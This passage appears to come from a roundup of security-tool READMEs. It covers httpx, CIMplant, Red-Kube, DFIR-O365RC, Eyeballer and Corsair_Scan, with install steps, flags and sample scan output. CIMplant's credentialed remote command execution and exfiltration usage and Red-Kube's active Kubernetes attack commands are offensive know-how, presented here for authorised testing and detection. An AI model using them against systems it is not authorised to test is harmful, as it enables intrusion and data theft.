▶ mv httpx-linux-amd64 /usr/local/bin/httpx
▶ httpx -h

From Source

httpx requires go1.14+ to install successfully. Run the following command to get the repo -

▶ GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx

From Github
▶ git clone https://github.com/projectdiscovery/httpx.git; cd httpx/cmd/httpx; go build; mv httpx /usr/local/bin/; httpx -version

Usage
httpx -h

This will display help for the tool. Here are all the switches it supports.

Flag | Description | Example
H | Custom Header input | httpx -H 'x-bug-bounty: hacker'
follow-redirects | Follow URL redirects (default false) | httpx -follow-redirects
follow-host-redirects | Follow URL redirects only on same host (default false) | httpx -follow-host-redirects
http-proxy | URL of the proxy server | httpx -http-proxy hxxp://proxy-host:80
l | File containing HOST/URLs/CIDR to process | httpx -l hosts.txt
no-color | Disable colors in the output | httpx -no-color
o | File to save output result (optional) | httpx -o output.txt
json | Prints all the probes in JSON format (default false) | httpx -json
vhost | Probes to detect vhost from list of subdomains | httpx -vhost
threads | Number of threads (default 50) | httpx -threads 100
http2 | HTTP2 probing | httpx -http2
pipeline | HTTP1.1 pipeline probing | httpx -pipeline
ports | Port ranges to probe (nmap syntax: eg 1,2-10,11) | httpx -ports 80,443,100-200
title | Prints title of page if available | httpx -title
path | Request path/file | httpx -path /api
paths | Request list of paths from file | httpx -paths paths.txt
content-length | Prints content length in the output | httpx -content-length
ml | Match content length in the output | httpx -content-length -ml 125
fl | Filter content length in the output | httpx -content-length -fl 0,43
status-code | Prints status code in the output | httpx -status-code
mc | Match status code in the output | httpx -status-code -mc 200,302
fc | Filter status code in the output | httpx -status-code -fc 404,500
tech-detect | Perform wappalyzer-based technology detection | httpx -tech-detect
tls-probe | Send HTTP probes on the extracted TLS domains | httpx -tls-probe
tls-grab | Perform TLS data grabbing | httpx -tls-grab
content-type | Prints content-type | httpx -content-type
location | Prints location header | httpx -location
csp-probe | Send HTTP probes on the extracted CSP domains | httpx -csp-probe
web-server | Prints running web server if available | httpx -web-server
sr | Store responses to file (default false) | httpx -sr
srd | Directory to store response (optional) | httpx -srd httpx-output
unsafe | Send raw requests skipping golang normalization | httpx -unsafe
request | File containing raw request to process | httpx -request
retries | Number of retries | httpx -retries
random-agent | Use randomly selected HTTP User-Agent header value | httpx -random-agent
silent | Prints only results in the output | httpx -silent
stats | Prints statistics every 5 seconds | httpx -stats
timeout | Timeout in seconds (default 5) | httpx -timeout 10
verbose | Verbose mode | httpx -verbose
version | Prints current version of httpx | httpx -version
x | Request method (default 'GET') | httpx -x HEAD
method | Output requested method | httpx -method
response-time | Output the response time | httpx -response-time
response-in-json | Include response in stdout (only works with -json) | httpx -response-in-json
websocket | Prints if a websocket is exposed | httpx -websocket
ip | Prints the host IP | httpx -ip
cname | Prints the cname record if available | httpx -cname
cdn | Check if domain's IP belongs to a known CDN | httpx -cdn
filter-string | Filter results based on filtered string | httpx -filter-string XXX
match-string | Filter results based on matched string | httpx -match-string XXX
filter-regex | Filter results based on filtered regex | httpx -filter-regex XXX
match-regex | Filter results based on matched regex | httpx -match-regex XXX

Running httpx with stdin

This will run the tool against all the hosts and subdomains in hosts.txt and return URLs running an HTTP webserver.

▶ cat hosts.txt | httpx 

__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_| v1.0
/_/

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

https://mta-sts.managed.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com

Running httpx with file input

This will run the tool against all the hosts and subdomains in hosts.txt and return URLs running an HTTP webserver.

▶ httpx -l hosts.txt -silent

https://docs.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com

Running httpx with CIDR input
▶ echo 173.0.84.0/24 | httpx -silent

https://173.0.84.29
https://173.0.84.43
https://173.0.84.31
https://173.0.84.44
https://173.0.84.12
https://173.0.84.4
https://173.0.84.36
https://173.0.84.45
https://173.0.84.14
https://173.0.84.25
https://173.0.84.46
https://173.0.84.24
https://173.0.84.32
https://173.0.84.9
https://173.0.84.13
https://173.0.84.6
https://173.0.84.16
https://173.0.84.34

Running httpx with subfinder
subfinder -d hackerone.com -silent | httpx -title -content-length -status-code -silent

https://mta-sts.forwarding.hackerone.com [404] [9339] [Page not found · GitHub Pages]
https://mta-sts.hackerone.com [404] [9339] [Page not found · GitHub Pages]
https://mta-sts.managed.hackerone.com [404] [9339] [Page not found · GitHub Pages]
https://docs.hackerone.com [200] [65444] [HackerOne Platform Documentation]
https://www.hackerone.com [200] [54166] [Bug Bounty - Hacker Powered Security Testing | HackerOne]
https://support.hackerone.com [301] [489] []
https://api.hackerone.com [200] [7791] [HackerOne API]
https://hackerone.com [301] [92] []
https://resources.hackerone.com [301] [0] []

Notes
  • By default, httpx probes HTTPS and falls back to HTTP only if HTTPS is not reachable.
  • To print both HTTP and HTTPS results, the no-fallback flag can be used.
  • A custom scheme for ports can be defined, for example -ports http:443,http:80,https:8443
  • vhost, http2, pipeline, ports, csp-probe, tls-probe and path are unique flags with different probes.
  • Unique flags should be used for specific use cases instead of running them as default with other flags.
  • When using the json flag, all the information (default probes) is included in the JSON output.

Thanks

httpx is made by the projectdiscovery team. Community contributions have made the project what it is. See the Thanks.md file for more details. Do also check out these similar awesome projects that may fit in your workflow:

Probing feature is inspired by @tomnomnom/httprobe work



CIMplant - C# Port Of WMImplant Which Uses Either CIM Or WMI To Query Remote Systems



C# port of WMImplant which uses either CIM or WMI to query remote systems. It can use provided credentials or the current user's session.

Note: Some commands will use PowerShell in combination with WMI, denoted with ** in the --show-commands command.


Introduction

CIMplant is a C# rewrite and expansion of @christruncer's WMImplant. It allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation (WMI) or the Common Information Model (CIM); more accurately, Windows Management Infrastructure (MI). CIMplant requires local administrator permissions on the target system.


Setup:

It's probably easiest to use the built version under Releases, just note that it is compiled in Debug mode. If you want to build the solution yourself, follow the steps below.

  1. Load CIMplant.sln into Visual Studio
  2. Go to Build at the top and then Build Solution if no modifications are wanted

Usage
CIMplant.exe --help
CIMplant.exe --show-commands
CIMplant.exe --show-examples
CIMplant.exe -s [remote IP address] -c cat -f c:\users\user\desktop\file.txt
CIMplant.exe -s [remote IP address] -u [username] -d [domain] -p [password] -c cat -f c:\users\test\desktop\file.txt
CIMplant.exe -s [remote IP address] -u [username] -d [domain] -p [password] -c command_exec --execute "dir c:\\"

Some Helpful Commands



Important Files

  1. Program.cs

This is the brains of the operation, the driver for the program.

  2. Connector.cs

This is where the initial CIM/WMI connections are made and passed to the rest of the application.

  3. ExecuteWMI.cs

All function code for the WMI commands.

  4. ExecuteCIM.cs

All function code for the CIM (MI) commands.


Detection

Of course, the first thing we'll want to be aware of is the initial WMI or CIM connection. In general, WMI uses DCOM as a communication protocol, whereas CIM uses WSMan (WinRM). This can be modified for CIM, and is in CIMplant, but let's go over the default values for now. For DCOM, the first thing we can do is look for initial TCP connections over port 135. The connecting and receiving systems then negotiate a new, very high port, so that will vary drastically. For WSMan, the initial TCP connection is over port 5985.

Next, you'll want to look at the Microsoft-Windows-WMI-Activity/Trace event log in the Event Viewer. Search for Event ID 11 and filter on the IsLocal property if possible. You can also look for Event ID 1295 within the Microsoft-Windows-WinRM/Analytic log.

Finally, you'll want to look for any modifications to the DebugFilePath property with the Win32_OSRecoveryConfiguration class. More detailed information about detection can be found at Part 1 of our blog series here: CIMplant Part 1: Detection of a C# Implementation of WMImplant
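
Those checks can be scripted as a starting point for hunting; a rough sketch that shells out to the built-in wevtutil and wmic utilities (note the Trace/Analytic channels must be enabled before they can be queried):

import subprocess

def show(cmd):
    out = subprocess.run(cmd, capture_output=True, text=True)
    print(out.stdout or out.stderr)

# WMI connections: Event ID 11 in the WMI-Activity trace channel.
show(["wevtutil", "qe", "Microsoft-Windows-WMI-Activity/Trace",
      "/q:*[System[EventID=11]]", "/f:text", "/c:10"])

# WinRM/WSMan connections: Event ID 1295 in the WinRM analytic channel.
show(["wevtutil", "qe", "Microsoft-Windows-WinRM/Analytic",
      "/q:*[System[EventID=1295]]", "/f:text", "/c:10"])

# CIMplant's output channel: current DebugFilePath of Win32_OSRecoveryConfiguration.
show(["wmic", "recoveros", "get", "DebugFilePath"])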



Red-Kube - Red Team K8S Adversary Emulation Based On Kubectl



Red Kube is a collection of kubectl commands written to evaluate the security posture of Kubernetes clusters from the attacker's perspective.

The commands are either passive for data collection and information disclosure or active for performing real actions that affect the cluster.

The commands are mapped to MITRE ATT&CK Tactics to help get a sense of where we have most of our gaps and prioritize our findings.

The current version is wrapped with a python orchestration module to run several commands in one run based on different scenarios or tactics.

Please use with care as some commands are active and actively deploy new containers or change the role-based access control configuration.

Warning: You should NOT use red-kube commands on a Kubernetes cluster that you don't own!


Prerequisites:

python3 requirements

pip3 install -r requirements.txt

kubectl (Ubuntu / Debian)

sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl
sudo curl -fsSLo /usr/share/keyrings/kubernetes-archive-keyring.gpg https://packages.cloud.google.com/apt/doc/apt-key.gpg
echo "deb [signed-by=/usr/share/keyrings/kubernetes-archive-keyring.gpg] https://apt.kubernetes.io/ kubernetes-xenial main" | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo apt-get update
sudo apt-get install -y kubectl

kubectl (Red Hat based)

cat <<EOF > /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
EOF
yum install -y kubectl

jq

sudo apt-get update -y
sudo apt-get install -y jq

Usage
usage: python3 main.py [-h] [--mode active/passive/all] [--tactic TACTIC_NAME] [--show_tactics] [--cleanup]

required arguments:
  --mode           run kubectl commands in active / passive / all modes
  --tactic         choose tactic

other arguments:
  -h, --help       show this help message and exit
  --show_tactics   show all tactics
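
For example, to run only the passive commands mapped to the Discovery tactic (a hypothetical invocation; tactic names follow the table below and their exact spelling may differ in the tool):

python3 main.py --mode passive --tactic discovery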

Commands by MITRE ATT&CK Tactics
Tactic | Count
Reconnaissance | 2
Initial Access | 0
Execution | 0
Persistence | 2
Privilege Escalation | 4
Defense Evasion | 1
Credential Access | 8
Discovery | 15
Lateral Movement | 0
Collection | 1
Command and Control | 2
Exfiltration | 1
Impact | 0

Webinars

1. First Workshop with Lab01 and Lab02: Webinar Link

2. Second Workshop with Lab03 and Lab04: Webinar Link


Presentations

BlackHat Asia 2021


Q&A

Why choose kubectl instead of the Kubernetes API in Python?

When performing red team assessments and adversary emulations, the quick manipulations and tweaks for the tools used in the arsenal are critical.

The ability to run such assessments and combine the k8s attack techniques based on kubectl and powerful Linux commands reduces the time and effort significantly.


Contact Us

This research was held by Lightspin's Security Research Team. For more information, contact us at support@lightspin.io.



DFIR-O365RC - PowerShell Module For Office 365 And Azure AD Log Collection



PowerShell module for Office 365 and Azure AD log collection


Module description

The DFIR-O365RC PowerShell module is a set of functions that allow the DFIR analyst to collect logs relevant for Office 365 Business Email Compromise investigations.

The logs are generated in JSON format and retrieved from two main data sources:

The two data sources can be queried from different endpoints:

Data source / Endpoint | History | Performance | Scope | Pre-requisites (OS or Azure)
Unified Audit Logs / Exchange Online PowerShell | 90 days | Poor | All Office 365 logs (Azure AD included) | None
Unified Audit Logs / Office 365 Management API | 7 days | Good | All Office 365 logs (Azure AD included) | Azure App registration
Azure AD Logs / Azure AD PowerShell Preview | 30 days | Good | Azure AD sign-ins and audit events only | Windows OS only
Azure AD Logs / MS Graph API | 30 days | Good | Azure AD sign-ins and audit events only | None

DFIR-O365RC is a forensic tool; its aim is not to monitor your Office 365 infrastructure in real time. Please use the Office 365 Management API if you want to analyze data in real time with a SIEM.

DFIR-O365RC will fetch data from:

  • Azure AD Logs using the MS Graph API because performance is good, history is 30 days and it works on PowerShell Core.
  • Unified Audit Logs using Exchange online PowerShell despite poor performance, history is 90 days and it works on PowerShell Core.

In case you are also investigating other Azure resources (IaaS, PaaS...), DFIR-O365RC can also fetch data from Azure Activity logs using the Azure Monitor REST API. History is 90 days and it works on PowerShell Core.

As a result, DFIR-O365RC also works on Linux or Mac, as long as you have PowerShell Core and a browser in order to use device login.


Installation and pre-requisites

Clone the DFIR-O365RC repository. The tool works on PowerShell Desktop and PowerShell Core.

DFIR-O365RC uses Jason Thompson's MSAL.PS and Boe Prox's PoshRSJob modules. To install them, run the following commands:

Install-Module -Name MSAL.PS -RequiredVersion '4.21.0.1'
Install-Module -Name PoshRSJob -RequiredVersion '1.7.4.4'

If MSAL.PS module installation fails with the following message:

WARNING: The specified module ‘MSAL.PS’ with PowerShellGetFormatVersion ‘2.0’ is not supported by the current version of PowerShellGet. Get the latest version of the PowerShellGet module to install this module, ‘MSAL.PS’.

Update PowerShellGet with the following commands:

Install-PackageProvider Nuget -Force
Install-Module -Name PowerShellGet -Force

Once both modules are installed, launch a PowerShell prompt and locate your PowerShell modules path with the following command:

PS> $env:PSModulePath

Copy the DFIR-O365RC directory in one of your modules path, for example on Windows:

  • %USERPROFILE%\Documents\WindowsPowerShell\Modules
  • %ProgramFiles%\WindowsPowerShell\Modules
  • %SYSTEMROOT%\system32\WindowsPowerShell\v1.0\Modules

Modules path examples on Linux:

  • /home/%USERNAME%/.local/share/powershell/Modules
  • /usr/local/share/powershell/Modules
  • /opt/microsoft/powershell/7/Modules

The DFIR-O365RC module is now installed; restart the PowerShell prompt and load the module:

PS> Import-module DFIR-O365RC

Roles and license requirements

The user launching the tool should have the following roles:

  • Microsoft 365 role (portal.microsoft.com): Global reader
  • Exchange Online role (outlook.office365.com/ecp): View-Only Audit Logs

In order to retrieve Azure AD sign-ins logs with the MS Graph API you need at least one user with an Azure AD Premium P1 license. This license can be purchased at additional cost for a single user and is sometimes included in some license plans such as the Microsoft 365 Business Premium for small and medium-sized businesses.

If you need to retrieve also the Azure Activity logs you need the Log Analytics Reader role for the Azure subscription you are dumping the logs from.


Functions included in the module

The module has eight functions:

Function name | Data source / History | Performance | Completeness | Details
Get-O365Full | Unified audit logs / 90 days | Poor | All unified audit logs | A subset of logs per record type can be retrieved. Use only on a small tenant or for a short period of time.
Get-O365Light | Unified audit logs / 90 days | Good | A subset of unified audit logs only | Only a subset of operations considered of interest is retrieved.
Get-DefenderforO365 | Unified audit logs / 90 days | Good | A subset of unified audit logs only | Retrieves Defender for Office 365 related logs. Requires at least an E5 license or a license plan such as Microsoft Defender for Office 365 Plan or Cloud App Security.
Get-AADLogs | Azure AD logs / 30 days | Good | All Azure AD logs | Gets tenant general information, all Azure sign-ins and audit logs. Azure AD sign-ins logs have more information than Azure AD logs retrieved via unified audit logs.
Get-AADApps | Azure AD logs / 30 days | Good | A subset of Azure AD logs only | Gets Azure audit logs related to Azure applications and service principals only. The logs are enriched with application or service principal object information.
Get-AADDevices | Azure AD logs / 30 days | Good | A subset of Azure AD logs only | Gets Azure audit logs related to Azure AD joined or registered devices only. The logs are enriched with device object information.
Search-O365 | Unified audit logs / 90 days | Depends on the query | A subset of unified audit logs only | Searches for activity related to a particular user or IP address, or uses a freetext query.
Get-AzRMActivityLogs | Azure Activity logs / 90 days | Good | All Azure Activity logs | Gets all Azure activity logs for a given subscription or for every subscription the account running the function has access to.

When querying unified audit logs you are limited to three concurrent Exchange Online PowerShell sessions. DFIR-O365RC will try to use all available sessions; please close any existing sessions before launching the log collection.

Each function has comment-based help, which you can invoke with the Get-Help cmdlet.

#Display comment based help
PS> Get-help Get-O365Full
#Display comment based help with examples
PS> Get-help Get-O365Full -examples

Each function takes as a parameter a start date and an end date.

In order to retrieve Azure AD audit logs, sign-ins logs from the past 30 days and tenant information launch the following command:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-AADLogs -startdate $startdate -enddate $enddate

In order to retrieve enriched Azure AD audit logs related to Azure applications and service principals from the past 30 days launch the following command:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-AADApps -startdate $startdate -enddate $enddate

In order to retrieve enriched Azure AD audit logs related to Azure AD joined or registered devices from the past 30 days launch the following command:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-AADDevices -startdate $startdate -enddate $enddate

In order to retrieve all unified audit logs considered of interest from the past 30 days, except those related to Azure AD, which were already retrieved by the first command, launch:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-O365Light -startdate $startdate -enddate $enddate -Operationsset "AllbutAzureAD"

In order to retrieve all unified audit logs considered of interest in a time window between -90 days and -30 days from now launch the following command:

$enddate = (get-date).adddays(-30)
$startdate = (get-date).adddays(-90)
Get-O365Light -StartDate $startdate -Enddate $enddate -Operationsset All

If mailbox audit is enabled and you also want to retrieve MailboxLogin operations, you can use the dedicated switch; on large tenants, beware of the 50,000 events per day retrieval limit.

Get-O365Light -StartDate $startdate -Enddate $enddate -Operationsset All -MailboxLogin $true

If there are users with Enterprise 5 licenses or if there is a Microsoft Defender for Office 365 Plan you can retrieve Microsoft Defender related logs with the following command:

$enddate = get-date
$startdate = $enddate.adddays(-90)
Get-DefenderforO365 -StartDate $startdate -Enddate $enddate

To retrieve all Exchange Online related records from the unified audit logs between Christmas Eve and Boxing Day (beware that performance might be poor on a large tenant):

$startdate = get-date "12/24/2020"
$enddate = get-date "12/26/2020"
Get-O365Full -StartDate $startdate -Enddate $enddate -RecordSet ExchangeOnly

You can use the search function to look for IP addresses, activity related to specific users, or to perform a freetext search in the unified audit logs:

$enddate = get-date
$startdate = $enddate.adddays(-90)
#Retrieve events using the Exchange online Powershell AppId
Search-O365 -StartDate $startdate -Enddate $enddate -FreeText "a0c73c16-a7e3-4564-9a95-2bdf47383716"

#Search for events related to the X.X.X.X and Y.Y.Y.Y IP addresses; the argument is a comma-separated string.
Search-O365 -StartDate $startdate -Enddate $enddate -IPAddresses "X.X.X.X,Y.Y.Y.Y"

#Retrieve events related to users user1@contoso.com and user2@contoso.com; the argument is a System.Array object
Search-O365 -StartDate $startdate -Enddate $enddate -UserIds "user1@contoso.com", "user2@contoso.com"

To retrieve all Azure Activity logs the account has access to, launch the following command; the available subscriptions will be displayed:

$enddate = get-date
$startdate = $enddate.adddays(-90)
Get-AzRMActivityLogs -StartDate $startdate -Enddate $enddate

When using PowerShell Core, the authentication process requires a device code. Use the DeviceCode parameter, then open https://microsoft.com/devicelogin in your browser and enter the code provided by the following message:

PS> Get-O365Light -StartDate $startdate -Enddate $enddate -DeviceCode:$true
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXX to authenticate.

Files generated

All files generated are in JSON format.

  • Get-AADApps creates a file named AADApps_%FQDN%.json in the azure_ad_apps folder, where FQDN is the domain name part of the account used to collect the logs.
  • Get-AADDevices creates a file named AADDevices_%FQDN%.json in the azure_ad_devices folder.
  • Get-AADLogs creates folders named after the current date, using the YYYY-MM-DD format, in the azure_ad_signin folder; in each directory a file called AADSigninLog_%FQDN%_YYYY-MM-DD_HH-00-00.json is created for Azure AD sign-in logs. A folder azure_ad_audit is also created, and results are dumped in files named AADAuditLog_%FQDN%_YYYY-MM-DD.json for Azure AD audit logs. Finally, a folder called azure_ad_tenant is created and the general tenant information is written to a file named AADTenant_%FQDN%.json.
  • Get-AzRMActivityLogs creates folders named after the current date, using the YYYY-MM-DD format, in the azure_rm_activity folder; in each directory a file called AzRM_%FQDN%_%SubscriptionID%_YYYY-MM-DD_HH-00-00.json is created, where %SubscriptionID% is the Azure subscription ID. A folder called azure_rm_subscriptions is created and each subscription's information is written to a file named AzRMsubscriptions_%FQDN%.json.
  • Get-O365Full creates folders named after the current date, using the YYYY-MM-DD format, in the O365_unified_audit_logs folder; in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD_HH-00-00.json is created.
  • Get-O365Light creates folders named after the current date, using the YYYY-MM-DD format, in the O365_unified_audit_logs folder; in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD.json is created.
  • Get-DefenderforO365 creates folders named after the current date, using the YYYY-MM-DD format, in the O365_unified_audit_logs folder; in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD_DefenderforO365.json is created.
  • Search-O365 creates folders named after the current date, using the YYYY-MM-DD format, in the O365_unified_audit_logs folder; in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD_%searchtype%.json is created, where searchtype can have the values "Freetext", "IPAddresses" or "UserIds".

Launching the various functions will generate a similar directory structure:

DFIR-O365_Logs
│ Get-AADApps.log
│ Get-AADDevices.log
│ Get-AADLogs.log
│ Get-AzRMActivityLogs.log
│ Get-DefenderforO365.log
│ Get-O365Light.log
│ Search-O365.log
└───azure_ad_apps
│ │ AADApps_%FQDN%.json
└───azure_ad_audit
│ │ AADAuditLog_%FQDN%_YYYY-MM-DD.json
│ │ ...
└───azure_ad_devices
│ │ AADDevices_%FQDN%.json
└───azure_ad_signin
│ │
│ └───YYYY-MM-DD
│ │ AADSigninLog_%FQDN%_YYYY-MM-DD_HH-00-00.json
│ │ ...
└───azure_ad_tenant
│ │ AADTenant_%FQDN%.json
└───azure_rm_activity
│ │
│ └───YYYY-MM-DD
│ │ AzRM_%FQDN%_%SubscriptionID%_YYYY-MM-DD_HH-00-00.json
│ │ ...
└───azure_rm_subscriptions
│ │ AzRMsubscriptions_%FQDN%.json
└───O365_unified_audit_logs
│ │
│ └───YYYY-MM-DD
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD.json
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD_freetext.json
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD_DefenderforO365.json
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD_HH-00-00.json
│ │ ...
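Because everything is plain JSON, the output tree lends itself to quick scripted triage. Below is a minimal post-processing sketch, not part of DFIR-O365RC: it assumes each unified audit log file holds either a JSON array or one JSON object per line, and that records expose the Operations field returned by Search-UnifiedAuditLog; adjust the path and field names to your actual output.

import glob
import json
from collections import Counter

# Hypothetical triage sketch: tally the Operations field across all unified
# audit log files produced under DFIR-O365_Logs. Handles both a whole-file
# JSON array and one JSON object per line.
operations = Counter()
for path in glob.glob("DFIR-O365_Logs/O365_unified_audit_logs/*/UnifiedAuditLog_*.json"):
    with open(path, encoding="utf-8") as fh:
        text = fh.read().strip()
    try:
        records = json.loads(text)
        if isinstance(records, dict):
            records = [records]
    except json.JSONDecodeError:
        records = [json.loads(line) for line in text.splitlines() if line.strip()]
    for record in records:
        operations[record.get("Operations", "unknown")] += 1

for operation, count in operations.most_common(10):
    print(f"{count:8d}  {operation}")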



Eyeballer - Convolutional Neural Network For Analyzing Pentest Screenshots



Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.


Example Labels

Old-Looking Sites



Login Pages


Webapp


Custom 404's


Parked Domains


What the Labels Mean

Old-Looking Sites Blocky frames, broken CSS, that certain "je ne sais quoi" of a website that looks like it was designed in the early 2000's. You know it when you see it. Old websites aren't just ugly, they're also typically super vulnerable. When you're looking to hack into something, these websites are a gold mine.

Login Pages Login pages are valuable to pen testing; they indicate that there's additional functionality you don't currently have access to. They also mean there's a simple follow-up: credential enumeration attacks. You might think that you can set a simple heuristic to find login pages, but in practice it's really hard. Modern sites don't just use a simple input tag we can grep for.

Webapp This tells you that there is a larger group of pages and functionality available here that can serve as attack surface. This is in contrast to a simple login page or a default IIS landing page, which offer no other functionality. This label should indicate to you that there is a web application here to attack.

Custom 404 Modern sites love to have cutesy custom 404 pages with pictures of broken robots or sad looking dogs. Unfortunately, they also love to return HTTP 200 response codes while they do it. More often, the "404" page doesn't even contain the text "404" in it. These pages are typically uninteresting, despite having a lot going on visually, and Eyeballer can help you sift them out.

Parked Domains Parked domains are websites that look real, but aren't valid attack surface. They're stand-in pages, usually devoid of any real functionality, consisting almost entirely of ads, and usually not run by our actual target. It's what you get when the specified domain is wrong or has lapsed. Finding these pages and removing them from scope is really valuable over time.


Setup

Install the required packages with pip:

sudo pip3 install -r requirements.txt

Or if you want GPU support:

sudo pip3 install -r requirements-gpu.txt

NOTE: Setting up a GPU for use with TensorFlow is way beyond the scope of this README. There's hardware compatibility to consider, drivers to install... There's a lot. So you're just going to have to figure this part out on your own if you want a GPU. But at least from a Python package perspective, the above requirements file has you covered.

Pretrained Weights

For the latest pretrained weights, check out the releases here on GitHub.

Training Data

You can find our training data here:

https://www.dropbox.com/s/rpylhiv2g0kokts/eyeballer-3.0.zip?dl=1

There are three things you need from the training data:

  1. images/ folder, containing all the screenshots (resized down to 224x224)
  2. labels.csv that has all the labels
  3. bishop-fox-pretrained-v3.h5 A pretrained weights file you can use right out of the box without training.

Copy all three into the root of the Eyeballer code tree.


Predicting Labels

NOTE: For best results, make sure you screenshot your websites in a native 1.6x aspect ratio, e.g. 1440x900. Eyeballer will scale the image down to the right size for you automatically, but if it's the wrong aspect ratio, it will squish in a way that affects prediction performance.
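If your screenshots aren't already 1.6x, a quick pre-pass can pad them to that ratio before resizing, avoiding the squish. A minimal sketch with Pillow; the screenshots/ path is a placeholder and this is not part of Eyeballer itself:

import glob
import math
from PIL import Image

# Pre-processing sketch: pad each screenshot onto a white 1.6x canvas,
# then resize to 1440x900 so no distortion happens during prediction.
for path in glob.glob("screenshots/*.png"):
    with Image.open(path) as img:
        img = img.convert("RGB")
        w, h = img.size
        target_w = max(w, math.ceil(h * 1.6))
        target_h = max(h, math.ceil(target_w / 1.6))
        canvas = Image.new("RGB", (target_w, target_h), "white")
        canvas.paste(img, (0, 0))
        canvas.resize((1440, 900)).save(path)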

To eyeball some screenshots, just run the "predict" mode:

eyeballer.py --weights YOUR_WEIGHTS.h5 predict YOUR_FILE.png

Or for a whole directory of files:

eyeballer.py --weights YOUR_WEIGHTS.h5 predict PATH_TO/YOUR_FILES/

Eyeballer will spit the results back to you in human-readable format (a results.html file so you can browse them easily) and machine-readable format (a results.csv file).


Performance

Eyeballer's performance is measured against an evaluation dataset, which is 20% of the overall screenshots chosen at random. Since these screenshots are never used in training, they can be an effective way to see how well the model is performing. Here are the latest results:

Overall Binary Accuracy | 93.52%
All-or-Nothing Accuracy | 76.09%

Overall Binary Accuracy is probably what you think of as the model's "accuracy". It's the chance, given any single label, that it is correct.

All-or-Nothing Accuracy is more strict. For this, we consider all of an image's labels and consider it a failure if ANY label is wrong. This accuracy rating is the chance that the model correctly predicts all labels for any given image.
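A toy illustration of the difference between the two metrics, assuming multi-label predictions stored as 0/1 numpy arrays (the shapes and values here are made up):

import numpy as np

# y_true/y_pred: (n_images, n_labels) arrays of 0/1 multi-label decisions.
y_true = np.array([[1, 0, 1], [0, 1, 0], [1, 1, 0]])
y_pred = np.array([[1, 0, 0], [0, 1, 0], [1, 1, 1]])

binary_acc = (y_true == y_pred).mean()                   # chance any single label is right
all_or_nothing = (y_true == y_pred).all(axis=1).mean()   # every label right per image

print(f"Overall binary accuracy: {binary_acc:.2%}")
print(f"All-or-nothing accuracy: {all_or_nothing:.2%}")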

Label | Precision | Recall
Custom 404 | 80.20% | 91.01%
Login Page | 86.41% | 88.47%
Webapp | 95.32% | 96.83%
Old Looking | 91.70% | 62.20%
Parked Domain | 70.99% | 66.43%

For a detailed explanation on Precision vs Recall, check out Wikipedia.


Training

To train a new model, run:

eyeballer.py train

You'll want a machine with a good GPU for this to run in a reasonable amount of time. Setting that up is outside the scope of this readme, however.

This will output a new model file (weights.h5 by default).


Evaluation

You just trained a new model, cool! Let's see how well it performs against some images it's never seen before, across a variety of metrics:

eyeballer.py --weights YOUR_WEIGHTS.h5 evaluate

The output will describe the model's accuracy in both recall and precision for each of the program's labels. (Including "none of the above" as a pseudo-label)



Corsair_Scan - A Security Tool To Test Cross-Origin Resource Sharing (CORS)



Corsair_scan is a security tool to test Cross-Origin Resource Sharing (CORS) misconfigurations. CORS is a mechanism that allows restricted resources on a web page to be requested from another domain outside the domain from which the first resource was served. If this is not properly configured, unauthorised domains can access those resources.


What is CORS?

CORS is an HTTP-header based mechanism that allows a server to indicate any other origins (domain, scheme, or port) than its own from which a browser should permit loading of resources. It works by adding new HTTP headers that let servers describe which origins are permitted to read that information from a web browser.

CORS also relies on a mechanism by which browsers make a “preflight” request to the server hosting the cross-origin resource, in order to check that the server will permit the actual request. In that preflight, the browser sends headers that indicate the HTTP method and headers that will be used in the actual request.
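To make the mechanism concrete, here is a minimal sketch (not part of corsair_scan; the URL and origin are placeholders) that issues a preflight-style OPTIONS request and prints the CORS headers the server returns:

import requests

# Send a preflight-style OPTIONS request with an Origin header and inspect
# the CORS policy the server declares in its response headers.
resp = requests.options(
    "https://example.com/api/resource",
    headers={
        "Origin": "https://attacker.example",
        "Access-Control-Request-Method": "GET",
    },
)
for name in ("Access-Control-Allow-Origin", "Access-Control-Allow-Credentials"):
    print(name, "=", resp.headers.get(name))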

The most common and problematic security issue when implementing CORS is the failure to validate/whitelist requestors. Too often, we see the value for Access-Control-Allow-Origin set to ‘*’.

Unfortunately, this is the default and as such allows any domain on the web to access that site’s resources.

As per the OWASP Application Security Verification Standard (ASVS), requirement 14.5.3 states

